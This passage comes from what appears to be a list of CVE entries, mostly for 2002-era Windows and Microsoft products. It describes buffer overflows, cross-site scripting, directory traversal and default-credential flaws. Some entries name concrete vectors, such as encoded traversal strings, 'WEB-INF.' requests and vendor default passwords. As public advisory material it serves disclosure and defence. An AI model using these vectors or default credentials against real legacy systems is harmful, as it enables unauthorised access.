Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264. [CVE-2002-2413] WebSite Pro 3.1.11.0 on Windows allows remote attackers to read script source code for files with extensions greater than 3 characters via a URL request that uses the equivalent 8.3 file name. [CVE-2002-2401] NT Virtual DOS Machine (NTVDM.EXE) in Windows 2000, NT and XP does not verify user execution permissions for 16-bit executable files, which allows local users to bypass the loader and execute arbitrary programs. [CVE-2002-2395] InterScan VirusWall 3.52 for Windows allows remote attackers to bypass virus protection and possibly execute arbitrary code via HTTP 1.1 gzip content encoding. [CVE-2002-2394] InterScan VirusWall 3.6 for Linux and 3.52 for Windows allows remote attackers to bypass virus protection and possibly execute arbitrary code via HTTP 1.1 chunked transfer encoding. [CVE-2002-2380] NetDSL ADSL Modem 800 with Microsoft Network firmware 5.5.11 allows remote attackers to gain access to configuration menus by sniffing undocumented usernames and passwords from network traffic. [CVE-2002-2328] Active Directory in Windows 2000, when supporting Kerberos V authentication and GSSAPI, allows remote attackers to cause a denial of service (hang) via an LDAP client that sets the page length to zero during a large request. [CVE-2002-2324] The "System Restore" directory and subdirectories, and possibly other subdirectories in the "System Volume Information" directory on Windows XP Professional, have insecure access control list (ACL) permissions, which allows local users to access restricted files and modify registry settings. [CVE-2002-2313] Eudora email client 5.1.1, with "use Microsoft viewer" enabled, allows remote attackers to execute arbitrary programs via an HTML email message containing a META refresh tag that references an embedded .mhtml file with ActiveX controls that execute a second embedded program, which is processed by Internet Explorer. [CVE-2002-2311] Microsoft Internet Explorer 6.0 and possibly others allows remote attackers to upload arbitrary file contents when users press a key corresponding to the JavaScript (1) event.ctrlKey or (2) event.shiftKey onkeydown event contained in a webpage. NOTE: it was reported that the vendor has disputed the severity of this issue. [CVE-2002-2275] Fortres 101 4.1 allows local users to bypass Fortres by pressing the Windows and "F" key together for 30 seconds, which opens multiple windows and eventually causes explorer.exe to crash, which then opens an unrestricted explorer.exe. [CVE-2002-2248] Buffer overflow in the sun.awt.windows.WDefaultFontCharset Java class implementation in Netscape 4.0 allows remote attackers to execute arbitrary code via an applet that calls the WDefaultFontCharset constructor with a long string and invokes the canConvert method. [CVE-2002-2224] Buffer overflow in PGPFreeware 7.03 running on Windows NT 4.0 SP6 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted Internet Key Exchange (IKE) response packets, possibly including (1) a large Security Parameter Index (SPI) field, (2) large number of payloads, or (3) a long payload. [CVE-2002-2169] Cross-site scripting vulnerability AOL Instant Messenger (AIM) 4.5 and 4.7 for MacOS and Windows allows remote attackers to conduct unauthorized activities, such as adding buddies and groups to a user's buddy list, via a URL with a META HTTP-EQUIV="refresh" tag to an aim: URL. [CVE-2002-2164] Buffer overflow in Microsoft Outlook Express 5.0, 5.5, and 6.0 allows remote attackers to cause a denial of service (crash) via a long <A HREF> link. [CVE-2002-2132] Windows File Protection (WFP) in Windows 2000 and XP does not remove old security catalog .CAT files, which could allow local users to replace new files with vulnerable old files that have valid hash codes. [CVE-2002-2101] Microsoft Outlook 2002 allows remote attackers to execute arbitrary JavaScript code, even when scripting is disabled, via an "about:" or "javascript:" URI in the href attribute of an "a" tag. [CVE-2002-2100] Microsoft Outlook 2002 allows remote attackers to embed bypass the file download restrictions for attachments via an HTML email message that uses an IFRAME to reference malicious content. [CVE-2002-2083] The Novell Netware client running on Windows 95 allows local users to bypass the login and open arbitrary files via the "What is this?" help feature, which can be launched from the Novell Netware login screen. [CVE-2002-2081] cphost.dll in Microsoft Site Server 3.0 allows remote attackers to cause a denial of service (disk consumption) via an HTTP POST of a file with a long TargetURL parameter, which causes Site Server to abort and leaves the uploaded file in c:\temp. [CVE-2002-2077] The DCOM client in Windows 2000 before SP3 does not properly clear memory before sending an "alter context" request, which may allow remote attackers to obtain sensitive information by sniffing the session. [CVE-2002-2070] SecureClean 3 build 2.0 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2069] PGP 6.x and 7.x does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2068] Eraser 5.3 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2067] East-Tec Eraser 2002 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2066] BestCrypt BCWipe 1.0.7 and 2.0 through 2.35.1 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2062] Cross-site scripting (XSS) vulnerability in ftp.htt in Internet Explorer 5.5 and 6.0, when running on Windows 2000 with "Enable folder view for FTP sites" and "Enable Web content in folders" selected, allows remote attackers to inject arbitrary web script or HTML via the hostname portion of an FTP URL. [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string. [CVE-2002-2028] The screensaver on Windows NT 4.0, 2000, XP, and 2002 does not verify if a domain account has already been locked when a valid password is provided, which makes it easier for users with physical access to conduct brute force password guessing. [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message. [CVE-2002-1981] Microsoft SQL Server 2000 through SQL Server 2000 SP2 allows the "public" role to execute the (1) sp_MSSetServerProperties or (2) sp_MSsetalertinfo stored procedures, which allows attackers to modify configuration including SQL server startup and alert settings. [CVE-2002-1973] Buffer overflow in CHttpServer::OnParseError in the ISAPI extension (Isapi.cpp) when built using Microsoft Foundation Class (MFC) static libraries in Visual C++ 5.0, and 6.0 before SP3, as used in multiple products including BadBlue, allows remote attackers to cause a denial of service (access violation and crash) and possibly execute arbitrary code via a long query string that causes a parsing error. [CVE-2002-1940] LCC-Win32 3.2 compiler, when running on Windows 95, 98, or ME, writes portions of previously used memory after the import table, which could allow attackers to gain sensitive information. NOTE: it has been reported that this problem is due to the OS and not the application. [CVE-2002-1923] The default configuration in MySQL 3.20.32 through 3.23.52, when running on Windows, does not have logging enabled, which could allow remote attackers to conduct activities without detection. [CVE-2002-1921] The default configuration of MySQL 3.20.32 through 3.23.52, when running on Windows, does set the bind address to the loopback interface, which allows remote attackers to connect to the database. [CVE-2002-1918] Buffer overflow in Microsoft Active Data Objects (ADO) in Microsoft MDAC 2.5 through 2.7 allows remote attackers to have unknown impact with unknown attack vectors. NOTE: due to the lack of details available regarding this issue, perhaps it should be REJECTED. [CVE-2002-1908] Microsoft IIS 5.0 and 5.1 allows remote attackers to cause a denial of service (CPU consumption) via an HTTP request with a Host header that contains a large number of "/" (forward slash) characters. [CVE-2002-1876] Microsoft Exchange 2000 allows remote authenticated attackers to cause a denial of service via a large number of rapid requests, which consumes all of the licenses that are granted to Exchange by IIS. [CVE-2002-1875] Entercept Agent 2.5 agent for Windows, released before May 21, 2002, allows local administrative users to obtain the entercept agent password, which could allow the administrators to log on as the entercept_agent account and conceal their identity. [CVE-2002-1873] Microsoft Exchange 2000, when used with Microsoft Remote Procedure Call (MSRPC), allows remote attackers to cause a denial of service (crash or memory consumption) via malformed MSRPC calls. [CVE-2002-1872] Microsoft SQL Server 6.0 through 2000, with SQL Authentication enabled, uses weak password encryption (XOR), which allows remote attackers to sniff and decrypt the password. [CVE-2002-1869] Heysoft EventSave 5.1 and 5.2 and Heysoft EventSave+ 5.1 and 5.2 does not check whether the log file can be written to, which allows attackers to prevent events from being recorded by opening the log file using an application such as Microsoft's Event Viewer. [CVE-2002-1861] Sybase Enterprise Application Server 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1860] Pramati Server 3.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1859] Orion Application Server 1.5.3, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1858] Oracle Oracle9i Application Server 1.0.2.2 and 9.0.2 through 9.0.2.0.1, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1857] jo! jo Webserver 1.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1856] HP Application Server 8.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1855] Macromedia JRun 3.0 through 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1848] TightVNC before 1.2.4 running on Windows stores unencrypted passwords in the password text control of the WinVNC Properties dialog, which could allow local users to access passwords. [CVE-2002-1839] Trend Micro InterScan VirusWall for Windows NT 3.52 does not record the sender's IP address in the headers for a mail message when it is passed from VirusWall to the MTA, which allows remote attackers to hide the origin of the message. [CVE-2002-1833] The default configurations for DocuTech 6110 and DocuTech 6115 have a default administrative password of (1) "service!" on Solaris 8.0 or (2) "administ" on Windows NT, which allows remote attackers to gain privileges. [CVE-2002-1831] Microsoft MSN Messenger Service 1.0 through 4.6 allows remote attackers to cause a denial of service (crash) via an invite request that contains hex-encoded spaces (%20) in the Invitation-Cookie field. [CVE-2002-1824] Microsoft Internet Explorer 6.0, when handling an expired CA-CERT in a webserver's certificate chain during a SSL/TLS handshake, does not prompt the user before searching for and finding a newer certificate, which may allow attackers to perform a man-in-the-middle attack. NOTE: it is not clear whether this poses a vulnerability. [CVE-2002-1817] Unknown vulnerability in Veritas Cluster Server (VCS) 1.2 for WindowsNT, Cluster Server 1.3.0 for Solaris, and Cluster Server 1.3.1 for HP-UX allows attackers to gain privileges via unknown attack vectors. [CVE-2002-1809] The default configuration of the Windows binary release of MySQL 3.23.2 through 3.23.52 has a NULL root password, which could allow remote attackers to gain unauthorized root access to the MySQL database. [CVE-2002-1795] Cross-site scripting (XSS) vulnerability in connect.asp in Microsoft Terminal Services Advanced Client (TSAC) ActiveX control allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2002-1790] The SMTP service in Microsoft Internet Information Services (IIS) 4.0 and 5.0 allows remote attackers to bypass anti-relaying rules and send spam or spoofed messages via encapsulated SMTP addresses, a similar vulnerability to CVE-1999-0682. [CVE-2002-1780] BPM Studio Pro 4.2 by ALCATech GmbH includes a webserver that allows a remote attacker to cause a denial of service (crash) by sending a URL request for a MS-DOS device such as con. NOTE: it has been disputed that this and possibly other application-level DOS device issues stem from a bug in Windows, and as such, such applications should not be considered vulnerable themselves. [CVE-2002-1779] The "block fragmented IP Packets" option in Symantec Norton Personal Firewall 2002 (NPW) does not properly protect against certain attacks on Windows vulnerabilities such as jolt2 (CVE-2000-0305). [CVE-2002-1776] DISPUTED NOTE: this issue has been disputed by the vendor. Symantec Norton AntiVirus 2002 allows remote attackers to bypass virus protection via a Word Macro virus with a .nch or .dbx extension, which is automatically recognized and executed as a Microsoft Office document. NOTE: the vendor has disputed this issue, acknowledging that the initial scan is bypassed, but the Office plug-in would detect the virus before it is executed. [CVE-2002-1770] Qualcomm Eudora 5.1 allows remote attackers to execute arbitrary code via an HTML e-mail message that uses a file:// URL in a t:video tag to reference an attached Windows Media Player file containing JavaScript code, which is launched and executed in the My Computer zone by Internet Explorer. [CVE-2002-1769] Microsoft Site Server 3.0 prior to SP4 installs a default user, LDAP_Anonymous, with a default password of LdapPassword_1, which allows remote attackers the "Log on locally" privilege. [CVE-2002-1762] Microsoft Baseline Security Analyzer (MBSA) 1.0 stores security scans in a known location C:\Documents and Settings\username\SecurityScans in plaintext, which could allow remote attackers to obtain sensitive information about the system via malicious active content such as ActiveX controls or Java. [CVE-2002-1749] Windows 2000 Terminal Services, when using the disconnect feature of the client, does not properly lock itself if it is left idle until the screen saver activates and the user disconnects, which could allow attackers to gain administrator privileges. [CVE-2002-1745] Off-by-one error in the CodeBrws.asp sample script in Microsoft IIS 5.0 allows remote attackers to view the source code for files with extensions containing with one additional character after .html, .htm, .asp, or .inc, such as .aspx files. [CVE-2002-1744] Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0 allows remote attackers to view source code and determine the existence of arbitrary files via a hex-encoded "%c0%ae%c0%ae" string, which is the Unicode representation for ".." (dot dot). [CVE-2002-1718] Microsoft Internet Information Server (IIS) 5.1 may allow remote attackers to view the contents of a Frontpage Server Extension (FPSE) file, as claimed using an HTTP request for colegal.htm that contains .. (dot dot) sequences. [CVE-2002-1717] Microsoft Internet Information Server (IIS) 5.1 allows remote attackers to view path information via a GET request to (1) /_vti_pvt/access.cnf, (2) /_vti_pvt/botinfs.cnf, (3) /_vti_pvt/bots.cnf, or (4) /_vti_pvt/linkinfo.cnf. [CVE-2002-1716] The Host() function in the Microsoft spreadsheet component on Microsoft Office XP allows remote attackers to create arbitrary files using the SaveAs capability. [CVE-2002-1714] Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to cause a denial of service (crash) via an object of type "text/html" with the DATA field that identifies the HTML document that contains the object, which may cause infinite recursion. [CVE-2002-1705] Microsoft Internet Explorer 5.5 through 6.0 allows remote attackers to cause a denial of service (crash) via a Cascading Style Sheet (CSS) with the p{cssText} element declared and a bold font weight. [CVE-2002-1698] Buffer overflow in Microsoft MSN Messenger Service 1.0 through 4.6 allows remote attackers to cause a denial of service (crash) via a long FN (font) argument in the message header. [CVE-2002-1696] Microsoft Outlook plug-in PGP version 7.0, 7.0.3, and 7.0.4 silently saves a decrypted copy of a message to hard disk when "Automatically decrypt/verify when opening messages" option is checked, "Always use Secure Viewer when decrypting" option is not checked, and the user replies to an encrypted message. [CVE-2002-1694] Microsoft Internet Information Server (IIS) 4.0 opens log files with FILE_SHARE_READ and FILE_SHARE_WRITE permissions, which could allow remote attackers to modify the log file contents while IIS is running. [CVE-2002-1688] The browser history feature in Microsoft Internet Explorer 5.5 through 6.0 allows remote attackers to execute arbitrary script as other users and steal authentication information via cookies by injecting JavaScript into the URL, which is executed when the user hits the Back button. [CVE-2002-1684] Directory traversal vulnerability in (1) Deerfield D2Gfx 1.0.2 or (2) BadBlue Enterprise Edition 1.5.x and BadBlue Personal Edition 1.5.6 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in the script used to read Microsoft Office documents. [CVE-2002-1671] Microsoft Internet Explorer 5.0, 5.01, and 5.5 allows remote attackers to monitor the contents of the clipboard via the getData method of the clipboardData object. [CVE-2002-1588] Mailtool for OpenWindows 3.6, 3.6.1, and 3.6.2 allows remote attackers to cause a denial of service (mailtool segmentation violation and crash) via a malformed mail attachment. [CVE-2002-1561] The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference. [CVE-2002-1325] Microsoft Virtual Machine (VM) build 5.0.3805 and earlier allows remote attackers to determine a local user's username via a Java applet that accesses the user.dir system property, aka "User.dir Exposure Vulnerability." [CVE-2002-1295] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to cause a denial of service (crash) and possibly conduct other unauthorized activities via applet tags in HTML that bypass Java class restrictions (such as private constructors) by providing the class name in the code parameter, aka "Incomplete Java Object Instantiation Vulnerability." [CVE-2002-1294] The Microsoft Java implementation, as used in Internet Explorer, can provide HTML object references to applets via Javascript, which allows remote attackers to cause a denial of service (crash due to illegal memory accesses) and possibly conduct other unauthorized activities via an applet that uses those references to access proprietary Microsoft methods. [CVE-2002-1293] The Microsoft Java implementation, as used in Internet Explorer, provides a public load0() method for the CabCracker class (com.ms.vm.loader.CabCracker), which allows remote attackers to bypass the security checks that are performed by the load() method. [CVE-2002-1292] The Microsoft Java virtual machine (VM) build 5.0.3805 and earlier, as used in Internet Explorer, allows remote attackers to extend the Standard Security Manager (SSM) class (com.ms.security.StandardSecurityManager) and bypass intended StandardSecurityManager restrictions by modifying the (1) deniedDefinitionPackages or (2) deniedAccessPackages settings, causing a denial of service by adding Java applets to the list of applets that are prevented from running. [CVE-2002-1291] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to read arbitrary local files and network shares via an applet tag with a codebase set to a "file://%00" (null character) URL. [CVE-2002-1290] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to read and modify the contents of the Clipboard via an applet that accesses the (1) ClipBoardGetText and (2) ClipBoardSetText methods of the INativeServices class. [CVE-2002-1289] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to read restricted process memory, cause a denial of service (crash), and possibly execute arbitrary code via the getNativeServices function, which creates an instance of the com.ms.awt.peer.INativeServices (INativeServices) class, whose methods do not verify the memory addresses that are passed as parameters. [CVE-2002-1288] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to determine the current directory of the Internet Explorer process via the getAbsolutePath() method in a File() call. [CVE-2002-1287] Stack-based buffer overflow in the Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to cause a denial of service via a long class name through (1) Class.forName or (2) ClassLoader.loadClass. [CVE-2002-1286] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to steal cookies and execute script in a different security context via a URL that contains a colon in the domain portion, which is not properly parsed and loads an applet from a malicious site within the security context of the site that is being visited by the user. [CVE-2002-1260] The Java Database Connectivity (JDBC) APIs in Microsoft Virtual Machine (VM) 5.0.3805 and earlier allow remote attackers to bypass security checks and access database contents via an untrusted Java applet. [CVE-2002-1258] Two vulnerabilities in Microsoft Virtual Machine (VM) up to and including build 5.0.3805, as used in Internet Explorer and other applications, allow remote attackers to read files via a Java applet with a spoofed location in the CODEBASE parameter in the APPLET tag, possibly due to a parsing error. [CVE-2002-1257] Microsoft Virtual Machine (VM) up to and including build 5.0.3805 allows remote attackers to execute arbitrary code by including a Java applet that invokes COM (Component Object Model) objects in a web site or an HTML mail. [CVE-2002-1255] Microsoft Outlook 2002 allows remote attackers to cause a denial of service (repeated failure) via an email message with a certain invalid header field that is accessed using POP3, IMAP, or WebDAV, aka "E-mail Header Processing Flaw Could Cause Outlook 2002 to Fail." [CVE-2002-1230] NetDDE Agent on Windows NT 4.0, 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code as LocalSystem via "shatter" style attack by sending a WM_COPYDATA message followed by a WM_TIMER message, as demonstrated by GetAd, aka "Flaw in Windows WM_TIMER Message Handling Could Enable Privilege Elevation." [CVE-2002-1181] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web pages for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allow remote attackers to execute HTML script as other users through (1) a certain ASP file in the IISHELP virtual directory, or (2) possibly other unknown attack vectors. [CVE-2002-1179] Buffer overflow in the S/MIME Parsing capability in Microsoft Outlook Express 5.5 and 6.0 allows remote attackers to execute arbitrary code via a digitally signed email with a long "From" address, which triggers the overflow when the user views or previews the message. [CVE-2002-1150] The Remote Desktop Sharing (RDS) Screen Saver Protection capability for Microsoft NetMeeting 3.01 through SP2 (4.4.3396) allows attackers with physical access to hijack remote sessions by entering certain logoff or shutdown sequences (such as CTRL-ALT-DEL) and canceling out of the resulting user confirmation prompts, such as when the remote user is editing a document. [CVE-2002-1145] The xp_runwebtask stored procedure in the Web Tasks component of Microsoft SQL Server 7.0 and 2000, Microsoft Data Engine (MSDE) 1.0, and Microsoft Desktop Engine (MSDE) 2000 can be executed by PUBLIC, which allows an attacker to gain privileges by updating a webtask that is owned by the database owner through the msdb.dbo.mswebtasks table, which does not have strong permissions. [CVE-2002-1143] Microsoft Word and Excel allow remote attackers to steal sensitive information via certain field codes that insert the information when the document is returned to the attacker, as demonstrated in Word using (1) INCLUDETEXT or (2) INCLUDEPICTURE, aka "Flaw in Word Fields and Excel External Updates Could Lead to Information Disclosure." [CVE-2002-1142] Heap-based buffer overflow in the Remote Data Services (RDS) component of Microsoft Data Access Components (MDAC) 2.1 through 2.6, and Internet Explorer 5.01 through 6.0, allows remote attackers to execute code via a malformed HTTP request to the Data Stub. [CVE-2002-1138] Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, writes output files for scheduled jobs under its own privileges instead of the entity that launched it, which allows attackers to overwrite system files, aka "Flaw in Output File Handling for Scheduled Jobs." [CVE-2002-1137] Buffer overflow in the Database Console Command (DBCC) that handles user inputs in Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, allows attackers to execute arbitrary code via a long SourceDB argument in a "non-SQL OLEDB data source" such as FoxPro, a variant of CAN-2002-0644. [CVE-2002-1123] Buffer overflow in the authentication function for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 allows remote attackers to execute arbitrary code via a long request to TCP port 1433, aka the "Hello" overflow. [CVE-2002-1117] Veritas Backup Exec 8.5 and earlier requires that the "RestrictAnonymous" registry key for Microsoft Exchange 2000 must be set to 0, which enables anonymous listing of the SAM database and shares. [CVE-2002-1095] Cisco VPN 3000 Concentrator before 2.5.2(F), with encryption enabled, allows remote attackers to cause a denial of service (reload) via a Windows-based PPTP client with the "No Encryption" option set. [CVE-2002-1056] Microsoft Outlook 2000 and 2002, when configured to use Microsoft Word as the email editor, does not block scripts that are used while editing email messages in HTML or Rich Text Format (RTF), which could allow remote attackers to execute arbitrary scripts via an email that the user forwards or replies to. [CVE-2002-1052] Jigsaw 2.2.1 on Windows systems allows remote attackers to use MS-DOS device names in HTTP requests to (1) cause a denial of service using the "con" device, or (2) obtain the physical path of the server using two requests to the "aux" device. [CVE-2002-1042] Directory traversal vulnerability in search engine for iPlanet web server 6.0 SP2 and 4.1 SP9, and Netscape Enterprise Server 3.6, when running on Windows platforms, allows remote attackers to read arbitrary files via ..\ (dot-dot backslash) sequences in the NS-query-pat parameter. [CVE-2002-1029] Res Manager in Worldspan for Windows Gateway 4.1 allows remote attackers to cause a denial of service (crash) via a malformed request to TCP port 17990. [CVE-2002-1015] RealJukebox 2 1.0.2.340 and 1.0.2.379, and RealOne Player Gold 6.0.10.505, allows remote attackers to execute arbitrary script in the Local computer zone by inserting the script into the skin.ini file of an RJS archive, then referencing skin.ini from a web page after it has been extracted, which is parsed as HTML by Internet Explorer or other Microsoft-based web readers. [CVE-2002-0982] Microsoft SQL Server 2000 SP2, when configured as a distributor, allows attackers to execute arbitrary code via the @scriptfile parameter to the sp_MScopyscript stored procedure. [CVE-2002-0978] Microsoft File Transfer Manager (FTM) ActiveX control before 4.0 allows remote attackers to upload or download arbitrary files to arbitrary locations via a man-in-the-middle attack with modified TGT and TGN parameters in a call to the "Persist" function. [CVE-2002-0977] Buffer overflow in Microsoft File Transfer Manager (FTM) ActiveX control before 4.0 allows remote attackers to execute arbitrary code via a long TS value. [CVE-2002-0975] Buffer overflow in Microsoft DirectX Files Viewer ActiveX control (xweb.ocx) 2.0.6.15 and earlier allows remote attackers to execute arbitrary via a long File parameter. [CVE-2002-0974] Help and Support Center for Windows XP allows remote attackers to delete arbitrary files via a link to the hcp: protocol that accesses uplddrvinfo.htm. [CVE-2002-0969] Buffer overflow in MySQL daemon (mysqld) before 3.23.50, and 4.0 beta before 4.02, on the Win32 platform, allows local users to execute arbitrary code via a long "datadir" parameter in the my.ini initialization file, whose permissions on Windows allow Full Control to the Everyone group. [CVE-2002-0965] Buffer overflow in TNS Listener for Oracle 9i Database Server on Windows systems, and Oracle 8 on VM, allows local users to execute arbitrary code via a long SERVICE_NAME parameter, which is not properly handled when writing an error message to a log file. [CVE-2002-0869] Unknown vulnerability in the hosting process (dllhost.exe) for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allows remote attackers to gain privileges by executing an out of process application that acquires LocalSystem privileges, aka "Out of Process Privilege Elevation." [CVE-2002-0867] Microsoft Virtual Machine (VM) up to and including build 5.0.3805 allows remote attackers to cause a denial of service (crash) in Internet Explorer via invalid handle data in a Java applet, aka "Handle Validation Flaw." [CVE-2002-0866] Java Database Connectivity (JDBC) classes in Microsoft Virtual Machine (VM) up to and including 5.0.3805 allow remote attackers to load and execute DLLs (dynamic link libraries) via a Java applet that calls the constructor for com.ms.jdbc.odbc.JdbcOdbc with the desired DLL terminated by a null string, aka "DLL Execution via JDBC Classes." [CVE-2002-0865] A certain class that supports XML (Extensible Markup Language) in Microsoft Virtual Machine (VM) 5.0.3805 and earlier, probably com.ms.osp.ospmrshl, exposes certain unsafe methods, which allows remote attackers to execute unsafe code via a Java applet, aka "Inappropriate Methods Exposed in XML Support Classes." [CVE-2002-0861] Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to bypass the "Allow paste operations via script" setting, even when it is disabled, via the (1) Copy method of the Cell object or (2) the Paste method of the Range object. [CVE-2002-0860] The LoadText method in the spreadsheet component in Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to read arbitrary files through Internet Explorer via a URL that redirects to the target file. [CVE-2002-0859] Buffer overflow in the OpenDataSource function of the Jet engine on Microsoft SQL Server 2000 allows remote attackers to execute arbitrary code. [CVE-2002-0833] Buffer overflow in Eudora 5.1.1 and 5.0-J for Windows, and possibly other versions, allows remote attackers to execute arbitrary code via a multi-part message with a long boundary string. [CVE-2002-0795] The rc system startup script for FreeBSD 4 through 4.5 allows local users to delete arbitrary files via a symlink attack on X Windows lock files. [CVE-2002-0788] An interaction between PGP 7.0.3 with the "wipe deleted files" option, when used on Windows Encrypted File System (EFS), creates a cleartext temporary files that cannot be wiped or deleted due to strong permissions, which could allow certain local users or attackers with physical access to obtain cleartext information. [CVE-2002-0736] Microsoft BackOffice 4.0 and 4.5, when configured to be accessible by other systems, allows remote attackers to bypass authentication and access the administrative ASP pages via an HTTP request with an authorization type (auth_type) that is not blank. [CVE-2002-0729] Microsoft SQL Server 2000 allows remote attackers to cause a denial of service via a malformed 0x08 packet that is missing a colon separator. [CVE-2002-0727] The Host function in Microsoft Office Web Components (OWC) 2000 and 2002 is exposed in components that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via the setTimeout method. [CVE-2002-0726] Buffer overflow in Microsoft Terminal Services Advanced Client (TSAC) ActiveX control allows remote attackers to execute arbitrary code via a long server name field. [CVE-2002-0725] NTFS file system in Windows NT 4.0 and Windows 2000 SP2 allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file. [CVE-2002-0723] Microsoft Internet Explorer 5.5 and 6.0 does not properly verify the domain of a frame within a browser window, which allows remote attackers to read client files or invoke executable objects via the Object tag, aka "Cross Domain Verification in Object Tag." [CVE-2002-0722] Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to misrepresent the source of a file in the File Download dialogue box to trick users into thinking that the file type is safe to download, aka "File Origin Spoofing." [CVE-2002-0721] Microsoft SQL Server 7.0 and 2000 installs with weak permissions for extended stored procedures that are associated with helper functions, which could allow unprivileged users, and possibly remote attackers, to run stored procedures with administrator privileges via (1) xp_execresultset, (2) xp_printstatements, or (3) xp_displayparamstmt. [CVE-2002-0720] A handler routine for the Network Connection Manager (NCM) in Windows 2000 allows local users to gain privileges via a complex attack that causes the handler to run in the LocalSystem context with user-specified code. [CVE-2002-0719] SQL injection vulnerability in the function that services for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute arbitrary commands via an MCMS resource request for image files or other files. [CVE-2002-0718] Web authoring command in Microsoft Content Management Server (MCMS) 2001 allows attackers to authenticate and upload executable content, by modifying the upload location, aka "Program Execution via MCMS Authoring Function." [CVE-2002-0700] Buffer overflow in a system function that performs user authentication for Microsoft Content Management Server (MCMS) 2001 allows attackers to execute code in the Local System context by authenticating to a web page that calls the function, aka "Unchecked Buffer in MDAC Function Could Enable SQL Server Compromise." [CVE-2002-0698] Buffer overflow in Internet Mail Connector (IMC) for Microsoft Exchange Server 5.5 allows remote attackers to execute arbitrary code via an EHLO request from a system with a long name as obtained through a reverse DNS lookup, which triggers the overflow in IMC's hello response. [CVE-2002-0697] Microsoft Metadirectory Services (MMS) 2.2 allows remote attackers to bypass authentication and modify sensitive data by using an LDAP client to directly connect to MMS and bypass the checks for MMS credentials. [CVE-2002-0696] Microsoft Visual FoxPro 6.0 does not register its associated files with Internet Explorer, which allows remote attackers to execute Visual FoxPro applications without warning via HTML that references specially-crafted filenames. [CVE-2002-0695] Buffer overflow in the Transact-SQL (T-SQL) OpenRowSet component of Microsoft Data Access Components (MDAC) 2.5 through 2.7 for SQL Server 7.0 or 2000 allows remote attackers to execute arbitrary code via a query that calls the OpenRowSet command. [CVE-2002-0692] Buffer overflow in SmartHTML Interpreter (shtml.dll) in Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to cause a denial of service (CPU consumption) or run arbitrary code, respectively, via a certain type of web file request. [CVE-2002-0691] Microsoft Internet Explorer 5.01 and 5.5 allows remote attackers to execute scripts in the Local Computer zone via a URL that references a local HTML resource file, a variant of "Cross-Site Scripting in Local HTML Resource" as identified by CAN-2002-0189. [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters. [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and 